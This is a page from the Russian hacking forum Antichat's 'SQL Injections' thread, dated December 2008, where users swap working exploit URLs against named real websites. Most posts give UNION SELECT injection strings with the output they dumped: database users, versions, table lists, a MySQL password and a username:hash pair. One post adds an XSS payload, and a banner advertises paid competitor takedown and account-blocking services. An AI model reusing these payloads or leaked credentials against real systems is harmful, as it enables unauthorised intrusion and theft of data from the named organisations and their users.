Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 700 из 1242

700

Опции темы

Поиск в этой теме

Опции просмотра

#6991

03.12.2008, 18:08

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от hackmen

http://honors.uoregon.edu/faculty/profiles/index.php?id=5+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,table_name,18+from+INFORMATION_SC HEMA.TABLES--

mysql user:
msuskin
-------
mysql password:
6fb107c04bba1a1d
-------
file_priv:
Y

#6992

03.12.2008, 21:17

..::TROYAN::..

Участник форума

Регистрация: 22.05.2008

Сообщений: 158

Провел на форуме:
2875309

Репутация: 348

Отправить сообщение для ..::TROYAN::.. с помощью ICQ

Код:

http://football.vtsnet.ru/view_article.php?id=-2+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4/*

db_football@localhost:db_football:4.0.18-log

XSS:

Код:

http://football.vtsnet.ru/search_request.php

Вводим в поле поиска :

Код:

"><script>alert(/xss/)</script><"

Код:

http://football.vtsnet.ru/statistics/players_personal.php?season=current&league=3&id=-1+union+select+1,2,user(),4,5,6,7,8,9/*

p.s вобщем в двиге очень много скулей=)еще там стоит форум PHPBB , версию неполучилось определитЬ,и прочесть данные из таблы phpbb_users...наверно туплю гдето....=///

PR: 4
ТИЦ: 90

#6993

04.12.2008, 02:57

plutus

Новичок

Регистрация: 03.11.2008

Сообщений: 25

Провел на форуме:
34070

Репутация: 20

http://en.apa.az/news.php?id=-86587+union+select+1,2,version(),4,5,6,7,8,9,10,11 ,12,13,14,15,16--

version 5

#6994

04.12.2008, 12:20

hackmen

Участник форума

Регистрация: 22.10.2007

Сообщений: 119

Провел на форуме:
598447

Репутация: 123

http://www.grid.iu.edu/news/news.php?id=9999+union+select+1,2,3,4,version(),6, 7,8--

rssuser@nukufetau-b

4.1.20-log

Последний раз редактировалось hackmen; 04.12.2008 в 20:25..

#6995

04.12.2008, 13:22

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Цитата:

http://malankara.in/diocese.php?id=294

Version: 4.1.20
User: malankara_root@localhost
Dbname: malankara_data

members found in DB
news found in DB

админка по адресу admin

#6996

04.12.2008, 14:40

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Код:

http://www.rozymnuk.com.ua/?chek=listgoods&id_categories=1/**/union/**/select/**/1,2,version(),4,5,6/*

Версия MySQL:
5.0.22
-------
Имя базы:
rozymnuk_comua
-------
Юзер:
rozymnuk_comua@localhost
-------
@@version_compile_os:
unknown-freebsd6.0
-------
Таблицы:

catalog
categories
chapters
clipart
clipart_group
orders
orders_goods
orders_old
pweek
recalls
ri_categories

#6997

04.12.2008, 16:02

Ghost0ff

Новичок

Регистрация: 18.11.2008

Сообщений: 28

Провел на форуме:
109973

Репутация: 15

Отправить сообщение для Ghost0ff с помощью ICQ

Пашкела. Исправляю... http://www.rozymnuk.com.ua/?chek=listgoods&id_categories=1/**/union/**/select/**/1,2,version(),4,5,6/*

Таблицы:
catalog
categories
chapters
clipart
clipart_group
orders
orders_goods
orders_old
pweek
recalls
ri_categories
ri_prices
saytnews
subscribe
users

pwd
email
nick

voitbase

#6998

04.12.2008, 18:55

Neoveneficus

Reservists Of Antichat - Level 6

Регистрация: 10.04.2008

Сообщений: 299

Провел на форуме:
1199829

Репутация: 405

Отправить сообщение для Neoveneficus с помощью ICQ

Звукозаписывающий лейбл

Код:

http://www.cd-maximum.ru/index.php?lang=ru&hid=999+union+select+1,concat(id,0x3a,name,0x3a,usr,0x3a,passwd)+from+users+limit+0,1/*

Version: 4.0.27
Database: cdmax
User: cdmax@zvm19.host.ru

Последний раз редактировалось Neoveneficus; 04.12.2008 в 20:36..

#6999

04.12.2008, 20:17

WAR!9G

Участник форума

Регистрация: 24.06.2007

Сообщений: 299

Провел на форуме:
467372

Репутация: 212

http://shkola.lv/index.php?mode=lesson&lsnid=-1+union+select+1,2,3,4,5/*
DATABASE: shkola
VERSION: 4.1.21
USER: shkola@localhost

Последний раз редактировалось WAR!9G; 05.12.2008 в 00:57..

#7000

04.12.2008, 23:32

hackmen

Участник форума

Регистрация: 22.10.2007

Сообщений: 119

Провел на форуме:
598447

Репутация: 123

http://www.gsd.umn.edu/article.php?id=9999+union+select+database(),versio n(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16--

gsd_main_db
4.1.22-log
gsduser@web.cla.umn.edu

UPD

http://www.assumption.edu/admin/hotnews/story.php?id=99999+union+select+1,username,3,passw ord,5,6,7,8+from+users--

msun:95c90aa47733b9023c318d9914606339

UPD+

http://www.asuci.uci.edu/news/story.php?id=999999+union+select+1,2,3,4,version() ,6,7,8,9,10,11,12,13,14,15,16,17--
5.0.67-community-nt

Последний раз редактировалось hackmen; 05.12.2008 в 02:22..

Страница 700 из 1242

700

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход